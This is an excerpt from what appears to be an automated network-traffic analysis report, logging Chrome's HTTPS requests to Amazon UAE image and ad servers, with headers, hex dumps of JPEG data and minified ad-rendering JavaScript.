                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC16384INData Raw: 8e 6f 52 94 4f 48 d7 8c b6 39 1a d2 d6 bd a3 a6 5a 1c 71 e0 82 c9 6e d0 b6 9b 3d 25 5c 56 7d f1 cd 54 f6 b8 be a2 47 4a 03 23 71 73 29 db 9f 72 26 6e 3b 5a de 99 41 64 9f 87 d5 2c 1f 89 7c 80 77 0c b2 41 ff 00 ba 54 8b 4d 6e 8e ba 46 d2 09 61 1d 09 91 8f 6f 2e f3 d0 82 88 66 36 fa 7a b8 a5 89 cf 3b 68 e4 88 3a 9e 95 cc c3 a3 7c 63 69 95 c4 f7 bd a4 00 14 25 70 71 db 01 3e 48 28 ef d7 01 6b d2 f7 3b 81 e5 ea 94 d2 cb ff 00 55 19 7f ee 58 f5 96 ca f2 e6 f9 e0 f7 17 3d ce 3d 5c 72 57 41 ca 02 94 26 0a 50 98 29 42 28 84 50 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10
                                                                                                                                                                                                                                                                Data Ascii: oROH9Zqn=%\V}TGJ#qs)r&n;ZAd,|wATMnFao.f6z;h:|ci%pq>H(k;UX==\rWA&P)B(P
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC16384INData Raw: 84 63 9f 5c 67 1d 4a d7 1b f4 86 c9 88 eb 2c 6e a3 8f 1c 22 a7 94 c6 fd 4d 4a 5c 3a 98 c4 b2 37 fa 4c 63 9b f6 ac fd d5 bc 98 fb ea f9 b9 5f 8e b7 9b 66 ab e2 b5 55 66 9e a8 6d c6 9a b5 94 90 d2 c9 16 70 f9 3b 26 33 68 dc 1a 73 bb 97 35 67 1c 6d 5e 6a 79 67 7b 72 75 e7 0d 74 1d bb 44 69 1a 2b 25 23 1b db b1 82 4b 85 43 47 39 aa 5c 07 69 21 3d 71 9e 4d f0 68 01 54 bd b8 a7 75 da 53 86 36 63 3c 5c e3 bd 87 87 93 43 6f f5 57 5d 6f 73 b3 b5 f5 26 48 22 64 71 92 43 5d 2c 9b 5f 8d c4 1c 34 34 9f 87 2c e7 8f 14 d9 86 4c d1 56 05 61 f4 c5 b5 cd 52 d8 af ba 7a 5a 38 1c 40 35 34 93 89 cb 41 3d 4c 4f 64 5c 87 93 8f c1 67 3a 7f 29 6b 8d 4c 78 c3 a3 15 75 a7 1c 7a 59 7f 1a 51 7f 36 53 ff 00 69 2a b7 83 ba a3 a8 ef 36 57 a2 1e 9b b7 c1 a4 6e 7a 87 60 75 c6 b6 ad d4 9d
                                                                                                                                                                                                                                                                Data Ascii: c\gJ,n"MJ\:7Lc_fUfmp;&3hs5gm^jyg{rutDi+%#KCG9\i!=qMhTuS6c<\CoW]os&H"dqC],_44,LVaRzZ8@54A=LOd\g:)kLxuzYQ6Si*6Wnz`u
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC16384INData Raw: 77 7d 0c d2 bf ea bd 9f fe 65 4d fd 93 57 3e dd 5d 3a f4 73 07 a6 17 fa ed 65 fe 6c ff 00 bc 48 ac e0 e8 a7 a9 eb 0c 1b 81 bc 45 6e 86 d7 30 57 55 b8 8b 3d 73 4d 25 cc 0e 7b 63 79 05 b2 81 fe ed e0 3b e1 91 de b6 64 a7 14 35 e2 bf 0c bb 9e 9e a2 96 ae 96 3a 8a 79 19 51 4b 50 c0 f8 a5 61 0f 63 d8 f1 90 e6 91 90 41 05 51 74 5a 3f 52 fa 25 68 fb 9d de 5a eb 5d ce a2 d1 4f 3b cc 92 50 b6 36 4d 1b 4b 8e 48 88 92 c2 c6 f8 03 9c 7c 39 2d f1 9e 61 5e da 78 99 e4 d9 7c 3b e1 b6 9a d0 56 67 5b 6c 91 bc 99 9c 24 ac ac 98 87 4d 33 c0 c0 2e 20 00 03 47 ba d0 30 3e 24 93 aa f7 9b 4f 36 da 52 2b 1c 98 1f a4 af 13 e8 f4 e6 92 9f 4d d1 cc 1d 7d be 44 61 74 6d 3c e1 a4 7f b3 2c 8f c1 e5 bd b9 63 7c 72 4f 72 d9 86 9b ce ed 79 f2 6d 1b 78 b8 dd 5b 51 7d 24 b5 7f c5 74 7f c8
                                                                                                                                                                                                                                                                Data Ascii: w}eMW>]:selHEn0WU=sM%{cy;d5:yQKPacAQtZ?R%hZ]O;P6MKH|9-a^x|;Vg[l$M3. G0>$O6R+M}Datm<,c|rOrymx[Q}$t


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                66192.168.2.449912151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC612OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1374INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 31002
                                                                                                                                                                                                                                                                Content-Type: text/javascript
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 6dacb469-d1a7-4273-ad3c-a3e25de9c412
                                                                                                                                                                                                                                                                Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 08 Aug 2024 13:22:33 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                Expires: Tue, 04 Feb 2025 13:23:38 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 345546
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:29 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100084-IAD, cache-nyc-kteb1890075-NYC
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC75INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 22 73 66 49 6d 70 72 65 73 73 69 6f 6e 22 2c 74 3d 22 4c 69 67 68 74 41 64 49 6d 70 72 65 73 73 69 6f 6e 22 2c 69 3d 22 76 69 65 77 61 62 6c 65 6c 61 74 65 6e 63 79 22 2c 61 3d 28 65 2c 74 2c 69 29 3d 3e 28 7b 63 73 61 4b 65 79 3a 65 2c 63 73 6d 4b 65 79 3a 74 2c 63 73 6d 4d 65 73 73 61 67 65 3a 69 7d 29 2c 73 3d 28 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 65 29 2c 61 28 22 62 6f 64 79 42 65 67 69 6e 22 2c 22 62 62 22 2c 74 29 2c 61 28 22 62 6f 64 79 45 6e 64 22 2c 22 62 65 22 29 29 2c 72 3d 28 61 28 22 63 6c 69 63 6b 54 6f 41 54 46 22 2c 22 61 66 22 29 2c 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65 22 2c 22 63 66 22 29 29 2c 6e 3d 28 61 28 22 63 72 69 74 69 63 61 6c 46 65 61 74 75 72 65
                                                                                                                                                                                                                                                                Data Ascii: (()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 2e 70 61 79 6c 6f 61 64 2c 66 3d 76 6f 69 64 20 30 21 3d 3d 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 76 69 65 77 61 62 69 6c 69 74 79 53 74 61 6e 64 61 72 64 73 29 3f 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 76 69 65 77 61 62 69 6c 69 74 79 53 74 61 6e 64 61 72 64 73 3a 6e 75 6c 6c 2c 6e 75 6c 6c 3d 3d 3d 66 26 26 64 65 6c 65 74 65 20 43 2e 76 69 65 77 61 62 69 6c 69 74 79 53 74 61 6e 64 61 72 64 73 7d 2c 49 3d 22 61 64 6c 6f 61 64 5f 72 65 6e 64 65 72 73 74 61 72 74 22 2c 53 3d 22 61 64 6c 6f 61 64 5f 72 65 6e 64 65 72 65 6e 64 22 2c 41 3d 22 69 6d 70 72 65 73 73 69 6f 6e 22 2c 5f 3d 22 76 69 65 77 61 62 69 6c 69 74 79 22 2c 4e 3d 22 75 6e 73 65 72 76 65 64 76 69 65 77 61 62 69 6c 69 74 79 22 2c 44 3d 22 61 64 6c 6f 61 64 3a 72 65
                                                                                                                                                                                                                                                                Data Ascii: .payload,f=void 0!==(null==e?void 0:e.viewabilityStandards)?null==e?void 0:e.viewabilityStandards:null,null===f&&delete C.viewabilityStandards},I="adload_renderstart",S="adload_renderend",A="impression",_="viewability",N="unservedviewability",D="adload:re
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 74 68 69 73 2e 77 61 69 74 46 6f 72 4d 65 73 73 61 67 65 50 72 6f 63 65 73 73 65 64 3d 61 73 79 6e 63 20 65 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 74 3d 3e 74 68 69 73 2e 70 65 6e 64 69 6e 67 4d 65 73 73 61 67 65 73 2e 73 65 74 28 65 2c 74 29 29 29 2c 74 68 69 73 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 3d 65 3d 3e 7b 74 72 79 7b 63 6f 6e 73 74 20 69 3d 65 2e 64 61 74 61 2c 61 3d 69 2e 63 6f 6d 6d 61 6e 64 3f 69 2e 63 6f 6d 6d 61 6e 64 2e 73 70 6c 69 74 28 22 2e 22 29 3a 5b 5d 3b 6c 65 74 20 73 3d 74 68 69 73 2e 63 5b 61 5b 30 5d 5d 3b 66 6f 72 28 6c 65 74 20 65 3d 31 3b 65 3c 61 2e 6c 65 6e 67 74 68 26 26 73 3b 65 2b 2b 29 73 3d 73 5b 61 5b 65 5d 5d 3b 69 66 28 22 63 75 73 74 6f 6d 4d 65 73 73 61 67 65 22 3d 3d 3d 69 2e 63 6f 6d 6d 61 6e 64 29
                                                                                                                                                                                                                                                                Data Ascii: this.waitForMessageProcessed=async e=>new Promise((t=>this.pendingMessages.set(e,t))),this.receiveMessage=e=>{try{const i=e.data,a=i.command?i.command.split("."):[];let s=this.c[a[0]];for(let e=1;e<a.length&&s;e++)s=s[a[e]];if("customMessage"===i.command)
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 74 68 28 22 3b 22 29 2c 63 3d 6e 2e 73 74 61 72 74 73 57 69 74 68 28 22 25 22 29 26 26 6f 2e 73 74 61 72 74 73 57 69 74 68 28 22 25 22 29 26 26 22 25 33 44 22 3d 3d 3d 6c 3b 69 3d 64 3f 69 2e 72 65 70 6c 61 63 65 28 4b 2c 58 2b 61 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2b 51 29 3a 63 3f 69 2e 72 65 70 6c 61 63 65 28 4b 2c 58 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 2b 51 29 3a 69 2e 72 65 70 6c 61 63 65 28 4b 2c 58 2b 61 2b 51 29 7d 77 68 69 6c 65 28 73 26 26 72 3c 31 30 29 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 20 74 7d 72 65 74 75 72 6e 20 69 7d 3b 63 6f 6e 73 74 20 5a 3d 28 65 2c 74 2c 69 2c 61 29 3d 3e 7b 74 72 79 7b 74 2e 63 6f 75 6e 74 4d 65 74 72 69 63 28 44 2c 31 29 2c 74 2e 6c 6f 67 43
                                                                                                                                                                                                                                                                Data Ascii: th(";"),c=n.startsWith("%")&&o.startsWith("%")&&"%3D"===l;i=d?i.replace(K,X+a.replace(/&/g,"&amp;")+Q):c?i.replace(K,X+encodeURIComponent(a)+Q):i.replace(K,X+a+Q)}while(s&&r<10)}catch(h){return t}return i};const Z=(e,t,i,a)=>{try{t.countMetric(D,1),t.logC
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 68 7d 60 29 7d 2c 6c 65 3d 61 73 79 6e 63 20 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 61 77 61 69 74 28 61 77 61 69 74 20 66 65 74 63 68 28 65 29 29 2e 74 65 78 74 28 29 3b 72 65 74 75 72 6e 20 64 65 28 74 29 7d 2c 64 65 3d 65 3d 3e 7b 74 72 79 7b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 70 61 72 73 65 28 65 29 2e 63 72 65 61 74 69 76 65 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 65 7d 7d 2c 63 65 3d 28 65 2c 74 29 3d 3e 7b 69 66 28 22 53 45 52 56 45 52 5f 53 49 44 45 22 3d 3d 3d 65 2e 63 72 65 61 74 69 76 65 2e 66 6c 6f 77 29 72 65 74 75 72 6e 20 61 3d 65 2e 68 74 6d 6c 43 6f 6e 74 65 6e 74 45 6e 63 6f 64 65 64 2c 73 3d 65 2e 68 74 6d 6c 43 6f 6e 74 65 6e 74 45 6e 63 6f 64 65 64 4c 65 6e 67 74 68 2c 7b 67 65 74 41 64 3a 61 73 79 6e 63 28 29 3d 3e 28 7b 63
                                                                                                                                                                                                                                                                Data Ascii: h}`)},le=async e=>{const t=await(await fetch(e)).text();return de(t)},de=e=>{try{return JSON.parse(e).creative}catch(t){return e}},ce=(e,t)=>{if("SERVER_SIDE"===e.creative.flow)return a=e.htmlContentEncoded,s=e.htmlContentEncodedLength,{getAd:async()=>({c
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 69 73 2e 6d 70 2e 6f 6e 6d 65 73 73 61 67 65 3d 74 68 69 73 2e 63 6d 72 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 2c 74 68 69 73 2e 63 2e 63 6f 75 6e 74 4d 65 74 72 69 63 28 22 61 64 6c 6f 61 64 3a 69 66 72 61 6d 65 69 6e 69 74 69 61 6c 69 7a 65 64 22 2c 31 29 2c 74 68 69 73 2e 63 2e 6c 6f 67 43 73 61 45 76 65 6e 74 28 22 61 64 6c 6f 61 64 5f 69 66 72 61 6d 65 69 6e 69 74 69 61 6c 69 7a 65 64 22 29 2c 6e 65 77 20 52 28 77 69 6e 64 6f 77 2c 22 41 44 50 54 5f 53 46 5f 52 45 53 49 5a 45 5f 41 53 50 45 43 54 5f 52 41 54 49 4f 5f 39 30 39 32 32 36 22 29 2e 69 73 54 31 28 29 7c 7c 28 28 65 2c 74 29 3d 3e 7b 74 2e 64 69 73 61 62 6c 65 52 65 73 69 7a 65 46 75 6e 63 7c 7c 65 2e 73 65 6e 64 4d 65 73 73 61 67 65 28 22 72 65 73 69 7a 65 53 61 66 65 46 72 61 6d 65
                                                                                                                                                                                                                                                                Data Ascii: is.mp.onmessage=this.cmr.receiveMessage,this.c.countMetric("adload:iframeinitialized",1),this.c.logCsaEvent("adload_iframeinitialized"),new R(window,"ADPT_SF_RESIZE_ASPECT_RATIO_909226").isT1()||((e,t)=>{t.disableResizeFunc||e.sendMessage("resizeSafeFrame
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 65 61 74 69 76 65 54 65 6d 70 6c 61 74 65 4e 61 6d 65 2c 61 73 79 6e 63 28 29 3d 3e 74 68 69 73 2e 6c 6f 61 64 41 64 28 74 29 29 3a 61 73 79 6e 63 28 29 3d 3e 7b 77 65 28 29 2c 74 68 69 73 2e 66 6f 72 63 65 52 65 6e 64 65 72 46 61 6c 6c 62 61 63 6b 45 78 70 65 72 69 65 6e 63 65 28 29 7d 3b 76 61 72 20 73 2c 72 2c 6e 7d 63 61 74 63 68 28 6f 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 2e 6c 6f 67 45 72 72 6f 72 28 22 43 6f 75 6c 64 6e 27 74 20 67 65 74 41 64 20 66 72 6f 6d 20 68 74 6d 6c 50 72 6f 76 69 64 65 72 22 2c 6f 29 2c 61 73 79 6e 63 28 29 3d 3e 7b 77 65 28 29 2c 74 68 69 73 2e 66 6f 72 63 65 52 65 6e 64 65 72 46 61 6c 6c 62 61 63 6b 45 78 70 65 72 69 65 6e 63 65 28 29 7d 7d 7d 2c 74 68 69 73 2e 65 6e 73 75 72 65 47 6c 6f 62 61 6c 73 3d 28 29 3d 3e
                                                                                                                                                                                                                                                                Data Ascii: eativeTemplateName,async()=>this.loadAd(t)):async()=>{we(),this.forceRenderFallbackExperience()};var s,r,n}catch(o){return this.c.logError("Couldn't getAd from htmlProvider",o),async()=>{we(),this.forceRenderFallbackExperience()}}},this.ensureGlobals=()=>
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 62 61 63 6b 53 74 61 74 69 63 41 64 48 65 6c 70 65 72 28 29 2c 74 68 69 73 2e 65 6e 73 75 72 65 47 6c 6f 62 61 6c 73 28 29 2c 74 68 69 73 2e 6d 70 2e 6f 6e 6d 65 73 73 61 67 65 3d 74 68 69 73 2e 63 6d 72 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 7d 2c 74 68 69 73 2e 6c 6f 61 64 41 64 3d 61 73 79 6e 63 20 65 3d 3e 7b 74 68 69 73 2e 6f 2e 69 73 4e 6f 49 6e 76 65 6e 74 6f 72 79 3d 21 31 2c 66 65 28 74 68 69 73 2e 63 2c 74 68 69 73 2e 6f 2c 74 68 69 73 2e 63 6d 73 29 3b 6c 65 74 20 74 3d 59 28 74 68 69 73 2e 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 50 61 72 61 6d 2c 65 29 3b 74 68 69 73 2e 69 73 56 69 64 65 6f 28 29 3f 6e 65 77 20 52 28 77 69 6e 64 6f 77 2c 22 41 44 50 54 5f 53 46 5f 41 44 53 50 5f 56 49 44 45 4f 5f 38 33 33 34 31 39 22 29 2e 69 73 54 31 28
                                                                                                                                                                                                                                                                Data Ascii: backStaticAdHelper(),this.ensureGlobals(),this.mp.onmessage=this.cmr.receiveMessage},this.loadAd=async e=>{this.o.isNoInventory=!1,fe(this.c,this.o,this.cms);let t=Y(this.clickTrackingParam,e);this.isVideo()?new R(window,"ADPT_SF_ADSP_VIDEO_833419").isT1(
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: 74 2e 6c 6f 67 45 72 72 6f 72 28 22 45 72 72 6f 72 20 61 70 70 65 6e 64 69 6e 67 20 62 6c 61 6e 6b 41 64 53 63 72 69 70 74 22 2c 69 29 7d 7d 2c 76 65 3d 65 3d 3e 21 21 28 22 74 72 75 65 22 21 3d 3d 65 2e 61 62 70 41 63 63 65 70 74 61 62 6c 65 26 26 65 2e 61 62 70 53 74 61 74 75 73 26 26 65 2e 65 6e 61 62 6c 65 46 61 6c 6c 62 61 63 6b 46 6f 72 41 62 70 53 74 61 74 75 73 65 73 26 26 65 2e 65 6e 61 62 6c 65 46 61 6c 6c 62 61 63 6b 46 6f 72 41 62 70 53 74 61 74 75 73 65 73 2e 69 6e 64 65 78 4f 66 28 6d 5b 65 2e 61 62 70 53 74 61 74 75 73 5d 29 3e 2d 31 29 2c 70 65 3d 61 73 79 6e 63 20 65 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 74 3d 3e 7b 6c 65 74 20 69 3d 2d 31 3b 63 6f 6e 73 74 20 61 3d 65 3d 3e 7b 63 6f 6e 73 74 20 61 3d 65 2e 64 61 74 61 2c 73 3d 22
                                                                                                                                                                                                                                                                Data Ascii: t.logError("Error appending blankAdScript",i)}},ve=e=>!!("true"!==e.abpAcceptable&&e.abpStatus&&e.enableFallbackForAbpStatuses&&e.enableFallbackForAbpStatuses.indexOf(m[e.abpStatus])>-1),pe=async e=>new Promise((t=>{let i=-1;const a=e=>{const a=e.data,s="


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                67192.168.2.449917151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745515_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 2589
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 119c465a-1b4b-4a2d-92c5-de6e76d91a53
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 30 Apr 2024 09:55:58 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Tue, 26 Apr 2044 08:00:37 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1378942
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:29 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100151-IAD, cache-ewr18168-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9b 00 01 00 03 00 03 01 01 01 00 00 00 00 00 00 00 00 00 06 07 08 03 04 05 02 01 09 10 00 02 02 02 01 02 04 02 06 07 04 0b 00 00 00 00 01 02 00 03 04 11 05 06 12 07 13 21 31 41 51 14 22 61 71 91 b1 15 52 53 81 82 93 a1 23 32 72 d3 08 16
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQ"aqRS#2r
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1211INData Raw: 84 34 79 59 3c 87 d9 45 12 ae ef 85 ca 9f 5b bf a2 f1 88 89 cb b6 c8 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 9c b8 d4 f9 b7 53 ed a4 2c 4e fe 5d ac bf 99 9c 53 9f 19 bb 5f f8 1e 59 d3 f1 58 bd 50 6c 77 37 79 fc ff 00 49 e3 72 95 d9 55 49 45 62 c0 03 6a 95 4e fd 1d 8e ed 01 bf df bd 4c ef c2 65 e5 74 5f 5a f3 fc 7a ab df dd 5d 6c 16 94 2c be 75 41 32 71 c3 7e a8 23 74 16 f6 1e 6c d4 34 d9 f5 d7 ef 13 34 73 5d 4d 7f 13 e2 27 51 1a ed ec 47 38 c1 f7 a2 bf 51 2a ad 49 fe 26 9d 4b 11 ec 64 f8 7a 9c 8f 2b c5 df 87 c3 53 46 1e 20 bc 5b 55 c5 2b 7c 91 61 7e c6 70 a2 d4 26 b5 20 ae f7 b6 95 07 8b 7d 0d c9 f0 b9 97 72 03 01 68 c0 76 45 a8 d2 c1 e9 4d 2a a6 9b 5a ec 2e 41 72 0a 81 b7 9b 5f 07 95 ba d0 3d 53 44 7b aa 8f fe ca 63 fd 20 f9 67 4e 0d 71 52 ed
                                                                                                                                                                                                                                                                Data Ascii: 4yY<E[S,N]S_YXPlw7yIrUIEbjNLet_Zz]l,uA2q~#tl44s]M'QG8Q*I&Kdz+SF [U+|a~p& }rhvEM*Z.Ar_=SD{c gNqR


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                68192.168.2.44991552.212.43.1354437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC821OUTGET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DC37SFEY0GDXEZ5HDEVRN:0 HTTP/1.1
                                                                                                                                                                                                                                                                Host: fls-eu.amazon.ae
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
